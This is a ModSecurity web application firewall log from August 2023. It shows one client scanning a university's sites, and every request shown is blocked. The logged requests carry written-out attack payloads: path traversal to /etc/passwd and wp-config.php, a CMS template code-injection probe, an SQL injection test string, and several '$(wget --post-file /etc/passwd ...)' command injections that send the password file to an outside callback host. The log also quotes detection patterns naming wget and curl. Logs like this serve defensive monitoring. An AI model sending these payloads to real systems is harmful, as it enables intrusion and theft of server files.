[Tue Aug 29 11:47:02.536328 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAcsLdMAAAAE"]
[Tue Aug 29 11:47:02.566702 2023] [:error] [pid 2263] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RsCo-f0AAAjXsgcAAAAG"]
[Tue Aug 29 11:47:03.400265 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14R8Co-f0AAAi-RI0AAAAH"]
[Tue Aug 29 11:47:03.400323 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14R8Co-f0AAAjM7CUAAAAT"]
[Tue Aug 29 11:47:03.407876 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14R8Co-f0AAAjIhmsAAAAJ"]
[Tue Aug 29 11:47:03.433187 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14R8Co-f0AAAjIhmwAAAAJ"]
[Tue Aug 29 11:47:03.456891 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14R8Co-f0AAAi-RI8AAAAH"]
[Tue Aug 29 11:47:03.487262 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14R8Co-f0AAAhzvp4AAAAx"]
[Tue Aug 29 11:47:04.429881 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14SMCo-f0AAAjM7CsAAAAT"]
[Tue Aug 29 11:47:05.393227 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAjkM0gAAAAI"]
[Tue Aug 29 11:47:05.405051 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAhzvqEAAAAx"]
[Tue Aug 29 11:47:05.406086 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAcsLdwAAAAE"]
[Tue Aug 29 11:47:05.473323 2023] [:error] [pid 2253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAjN0SEAAAAU"]
[Tue Aug 29 11:47:05.490561 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAcsLd4AAAAE"]
[Tue Aug 29 11:47:06.363507 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/download"] [unique_id "ZO14SsCo-f0AAAjW9BkAAAAA"]
[Tue Aug 29 11:47:06.364332 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjkM0sAAAAI"]
[Tue Aug 29 11:47:06.364401 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjkM0sAAAAI"]
[Tue Aug 29 11:47:06.367517 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjCbCUAAAAB"]
[Tue Aug 29 11:47:06.367587 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjCbCUAAAAB"]
[Tue Aug 29 11:47:06.431225 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjcHXMAAAAY"]
[Tue Aug 29 11:47:06.431301 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjcHXMAAAAY"]
[Tue Aug 29 11:47:06.500290 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjcHXUAAAAY"]
[Tue Aug 29 11:47:06.500368 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjcHXUAAAAY"]
[Tue Aug 29 11:47:06.570112 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAhT3@AAAAAD"]
[Tue Aug 29 11:47:06.570179 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAhT3@AAAAAD"]
[Tue Aug 29 11:47:07.398541 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26guaw4wpuadugyr.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAh130MAAAAz"]
[Tue Aug 29 11:47:07.548453 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26guj8otut64ducg.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAjKyv4AAAAQ"]
[Tue Aug 29 11:47:07.589868 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14S8Co-f0AAAjavy8AAAAV"]
[Tue Aug 29 11:47:07.589946 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14S8Co-f0AAAjavy8AAAAV"]
[Tue Aug 29 11:47:07.609162 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26gmuor98tup5414.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAjavzAAAAAV"]
[Tue Aug 29 11:47:07.629736 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26gq1im63xyymrbt.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAjavzEAAAAV"]
[Tue Aug 29 11:47:07.694534 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAjavzQAAAAV"]
[Tue Aug 29 11:47:07.708125 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26gim7fmngtqs368.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAjCbCgAAAAB"]
[Tue Aug 29 11:47:07.730895 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAjCbCkAAAAB"]
[Tue Aug 29 11:47:07.731112 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAjZRYkAAAAS"]
[Tue Aug 29 11:47:07.760736 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAjavzYAAAAV"]
[Tue Aug 29 11:47:07.776734 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAjZRYsAAAAS"]
[Tue Aug 29 11:47:08.375652 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26gt3xmn4ggipf3z.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14TMCo-f0AAAjCbCwAAAAB"]
[Tue Aug 29 11:47:08.546750 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14TMCo-f0AAAjCbDIAAAAB"]
[Tue Aug 29 11:47:10.445109 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14TsCo-f0AAAjrbGoAAAAP"]
